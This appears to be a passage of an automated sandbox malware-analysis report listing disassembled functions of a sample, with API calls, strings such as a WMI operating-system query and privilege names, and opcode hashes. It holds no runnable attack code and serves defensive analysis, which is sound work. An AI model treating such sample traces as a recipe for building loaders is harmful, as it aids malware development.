                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c2d010f8c7d3f6b0e53fa5468ff023cbe9a72f33f63f78bd8479c8c1a3ac108c
                                                                                                    • Instruction ID: 590658c3b05eaafaa03a515cd82a29d8ffba4425ecc271aa04b3909d04ddcc1e
                                                                                                    • Opcode Fuzzy Hash: c2d010f8c7d3f6b0e53fa5468ff023cbe9a72f33f63f78bd8479c8c1a3ac108c
                                                                                                    • Instruction Fuzzy Hash: 8451DFB1A087159FC748CF19D48055AF7E1FF88314F058A2EE899E3340D734EA99CB9A
                                                                                                    Function 00E13E0B Relevance: .1, Instructions: 112COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                                                                    • Instruction ID: 2be1541a4164e89f5709b9053e1f65f98966440877f850fcdb0414159f0a4675
                                                                                                    • Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                                                                    • Instruction Fuzzy Hash: FB31E7B1B1474A8FCB18DF28C8512AAFBE0FB95304F14952DE495E7341C735EA8ACB91
                                                                                                    Function 00E0E2E8 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 234COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • _swprintf.LIBCMT ref: 00E0E30E
                                                                                                      • Part of subcall function 00E04092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E040A5
                                                                                                      • Part of subcall function 00E11DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,00E41030,?,00E0D928,00000000,?,00000050,00E41030), ref: 00E11DC4
                                                                                                    • _strlen.LIBCMT ref: 00E0E32F
                                                                                                    • SetDlgItemTextW.USER32(?,00E3E274,?), ref: 00E0E38F
                                                                                                    • GetWindowRect.USER32(?,?), ref: 00E0E3C9
                                                                                                    • GetClientRect.USER32(?,?), ref: 00E0E3D5
                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00E0E475
                                                                                                    • GetWindowRect.USER32(?,?), ref: 00E0E4A2
                                                                                                    • SetWindowTextW.USER32(?,?), ref: 00E0E4DB
                                                                                                    • GetSystemMetrics.USER32(00000008), ref: 00E0E4E3
                                                                                                    • GetWindow.USER32(?,00000005), ref: 00E0E4EE
                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00E0E51B
                                                                                                    • GetWindow.USER32(00000000,00000002), ref: 00E0E58D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                                                                    • String ID: $%s:$CAPTION$d$t
                                                                                                    • API String ID: 2407758923-369353836
                                                                                                    • Opcode ID: 57d4570db8b388656bb7d3e703ab0a7bf7c7fda35f6112c5b9daad4c11de2945
                                                                                                    • Instruction ID: 9da515675f056abd8033ecc361a84011fa772e8d6e1742e3794e80fda019ff25
                                                                                                    • Opcode Fuzzy Hash: 57d4570db8b388656bb7d3e703ab0a7bf7c7fda35f6112c5b9daad4c11de2945
                                                                                                    • Instruction Fuzzy Hash: 9881B371108301AFD710DFB9DC89A6BBBE9EBC9704F04192DFA84B3291D674E9498B52
                                                                                                    Function 00E2CB22 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 114COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___free_lconv_mon.LIBCMT ref: 00E2CB66
                                                                                                      • Part of subcall function 00E2C701: _free.LIBCMT ref: 00E2C71E
                                                                                                      • Part of subcall function 00E2C701: _free.LIBCMT ref: 00E2C730
                                                                                                      • Part of subcall function 00E2C701: _free.LIBCMT ref: 00E2C742
                                                                                                      • Part of subcall function 00E2C701: _free.LIBCMT ref: 00E2C754
                                                                                                      • Part of subcall function 00E2C701: _free.LIBCMT ref: 00E2C766
                                                                                                      • Part of subcall function 00E2C701: _free.LIBCMT ref: 00E2C778
                                                                                                      • Part of subcall function 00E2C701: _free.LIBCMT ref: 00E2C78A
                                                                                                      • Part of subcall function 00E2C701: _free.LIBCMT ref: 00E2C79C
                                                                                                      • Part of subcall function 00E2C701: _free.LIBCMT ref: 00E2C7AE
                                                                                                      • Part of subcall function 00E2C701: _free.LIBCMT ref: 00E2C7C0
                                                                                                      • Part of subcall function 00E2C701: _free.LIBCMT ref: 00E2C7D2
                                                                                                      • Part of subcall function 00E2C701: _free.LIBCMT ref: 00E2C7E4
                                                                                                      • Part of subcall function 00E2C701: _free.LIBCMT ref: 00E2C7F6
                                                                                                    • _free.LIBCMT ref: 00E2CB5B
                                                                                                      • Part of subcall function 00E28DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00E2C896,?,00000000,?,00000000,?,00E2C8BD,?,00000007,?,?,00E2CCBA,?), ref: 00E28DE2
                                                                                                      • Part of subcall function 00E28DCC: GetLastError.KERNEL32(?,?,00E2C896,?,00000000,?,00000000,?,00E2C8BD,?,00000007,?,?,00E2CCBA,?,?), ref: 00E28DF4
                                                                                                    • _free.LIBCMT ref: 00E2CB7D
                                                                                                    • _free.LIBCMT ref: 00E2CB92
                                                                                                    • _free.LIBCMT ref: 00E2CB9D
                                                                                                    • _free.LIBCMT ref: 00E2CBBF
                                                                                                    • _free.LIBCMT ref: 00E2CBD2
                                                                                                    • _free.LIBCMT ref: 00E2CBE0
                                                                                                    • _free.LIBCMT ref: 00E2CBEB
                                                                                                    • _free.LIBCMT ref: 00E2CC23
                                                                                                    • _free.LIBCMT ref: 00E2CC2A
                                                                                                    • _free.LIBCMT ref: 00E2CC47
                                                                                                    • _free.LIBCMT ref: 00E2CC5F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                    • String ID: h
                                                                                                    • API String ID: 161543041-3415971826
                                                                                                    • Opcode ID: 201d0f9adcbecb37c216cc901cd8fcdc35f0222b80924195ec9fd8c3018e07b9
                                                                                                    • Instruction ID: eab956c91887a415a1d29a4d011411792edfb89d67aa0189e24de189e4eaad2b
                                                                                                    • Opcode Fuzzy Hash: 201d0f9adcbecb37c216cc901cd8fcdc35f0222b80924195ec9fd8c3018e07b9
                                                                                                    • Instruction Fuzzy Hash: B8315C316013259FEB20AA39F946B5AB7E9AF50318F207829E548F71A2DF31EC44CB10
                                                                                                    Function 00E296F1 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 54COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • _free.LIBCMT ref: 00E29705
                                                                                                      • Part of subcall function 00E28DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00E2C896,?,00000000,?,00000000,?,00E2C8BD,?,00000007,?,?,00E2CCBA,?), ref: 00E28DE2
                                                                                                      • Part of subcall function 00E28DCC: GetLastError.KERNEL32(?,?,00E2C896,?,00000000,?,00000000,?,00E2C8BD,?,00000007,?,?,00E2CCBA,?,?), ref: 00E28DF4
                                                                                                    • _free.LIBCMT ref: 00E29711
                                                                                                    • _free.LIBCMT ref: 00E2971C
                                                                                                    • _free.LIBCMT ref: 00E29727
                                                                                                    • _free.LIBCMT ref: 00E29732
                                                                                                    • _free.LIBCMT ref: 00E2973D
                                                                                                    • _free.LIBCMT ref: 00E29748
                                                                                                    • _free.LIBCMT ref: 00E29753
                                                                                                    • _free.LIBCMT ref: 00E2975E
                                                                                                    • _free.LIBCMT ref: 00E2976C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                    • String ID: 0d
                                                                                                    • API String ID: 776569668-2809447700
                                                                                                    • Opcode ID: 36cd2f1bebeacf48050df412a08e2f4527b890af362c2fa22234e896a2029913
                                                                                                    • Instruction ID: aaa786101eb9ab237b73cfa9834fce209f6a14f6862f2876de2711b7eb647d6b
                                                                                                    • Opcode Fuzzy Hash: 36cd2f1bebeacf48050df412a08e2f4527b890af362c2fa22234e896a2029913
                                                                                                    • Instruction Fuzzy Hash: 8311D476111019BFDB01EF54EA42CD93BB9EF14350B1168A1FA08AF272DE32DA549B84
                                                                                                    Function 00E19711 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 126memoryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • _wcslen.LIBCMT ref: 00E19736
                                                                                                    • _wcslen.LIBCMT ref: 00E197D6
                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 00E197E5
                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00E19806
                                                                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00E1982D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
                                                                                                    • String ID: Fjun$</html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                                                    • API String ID: 1777411235-1684715023
                                                                                                    • Opcode ID: b57343b8f7932f6c4ac20037a8a27bb6b30b1e84ae09b7022b0a077065a50c37
                                                                                                    • Instruction ID: 2cb2d5271c2c0bbe8eae7ced828650c91bc111a54ca9bbc6da3ed26c1302e9e6
                                                                                                    • Opcode Fuzzy Hash: b57343b8f7932f6c4ac20037a8a27bb6b30b1e84ae09b7022b0a077065a50c37
                                                                                                    • Instruction Fuzzy Hash: 6C3128725083157EE725AF34AC06FABBBD89F42710F14211EF501B61D3EB74DA8983A6
                                                                                                    Function 00E1D69E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetWindow.USER32(?,00000005), ref: 00E1D6C1
                                                                                                    • GetClassNameW.USER32(00000000,?,00000800), ref: 00E1D6ED
                                                                                                      • Part of subcall function 00E11FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00E0C116,00000000,.exe,?,?,00000800,?,?,?,00E18E3C), ref: 00E11FD1
                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00E1D709
                                                                                                    • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00E1D720
                                                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 00E1D734
                                                                                                    • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00E1D75D
                                                                                                    • DeleteObject.GDI32(00000000), ref: 00E1D764
                                                                                                    • GetWindow.USER32(00000000,00000002), ref: 00E1D76D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                                                                    • String ID: STATIC
                                                                                                    • API String ID: 3820355801-1882779555
                                                                                                    • Opcode ID: f2785498f69e3f593f07fb87e1db6b24381ba917a640fa27b9cf0748a33afe11
                                                                                                    • Instruction ID: ba3848b751c7d0014f85fc436f02ec1e7c11be61a6fe9028be31351372afb176
                                                                                                    • Opcode Fuzzy Hash: f2785498f69e3f593f07fb87e1db6b24381ba917a640fa27b9cf0748a33afe11
                                                                                                    • Instruction Fuzzy Hash: AC113A726053107FE2206B71AC4AFEF769CAF54751F006121FA51F10D2D6A48E8942B5
                                                                                                    Function 00E22E31 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                                                                    • String ID: csm$csm$csm
                                                                                                    • API String ID: 322700389-393685449
                                                                                                    • Opcode ID: 418950f48319588771404cf2bc39e1219f1a66e01714813af55445039f9c4a97
                                                                                                    • Instruction ID: 1828c3301a55e9effccb4cff0b9081762d99ee963d84cfb3b392d61d0179bbb9
                                                                                                    • Opcode Fuzzy Hash: 418950f48319588771404cf2bc39e1219f1a66e01714813af55445039f9c4a97
                                                                                                    • Instruction Fuzzy Hash: 29B19A71900229EFCF29DFA4E9819AEBBB5FF04314F14615AE9017B212C739DA61CF91
                                                                                                    Function 00E0AF24 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 210COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10$n
                                                                                                    • API String ID: 3519838083-140586453
                                                                                                    • Opcode ID: 32f652d08f2f1aaf256392c8645c75753c74f82a29fdc0348eb992ac2ce135c0
                                                                                                    • Instruction ID: bb146b444d5120ad21e33e14e4d3da29632b10e8f77e662ad2f5c699f0c97a10
                                                                                                    • Opcode Fuzzy Hash: 32f652d08f2f1aaf256392c8645c75753c74f82a29fdc0348eb992ac2ce135c0
                                                                                                    • Instruction Fuzzy Hash: BE716C71A00219EFDB14DFA5CC99DAFBBB9FF48714B041169E512B72A0CB30AD85CB50
                                                                                                    Function 00E06FA5 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 134COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 00E06FAA
                                                                                                    • _wcslen.LIBCMT ref: 00E07013
                                                                                                    • _wcslen.LIBCMT ref: 00E07084
                                                                                                      • Part of subcall function 00E07A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00E07AAB
                                                                                                      • Part of subcall function 00E07A9C: GetLastError.KERNEL32 ref: 00E07AF1
                                                                                                      • Part of subcall function 00E07A9C: CloseHandle.KERNEL32(?), ref: 00E07B00
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
                                                                                                    • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                                    • API String ID: 3122303884-3508440684
                                                                                                    • Opcode ID: fca2e4654284c3899af02fd732df59017a96b04c8d746dd8421aad1f581c29c6
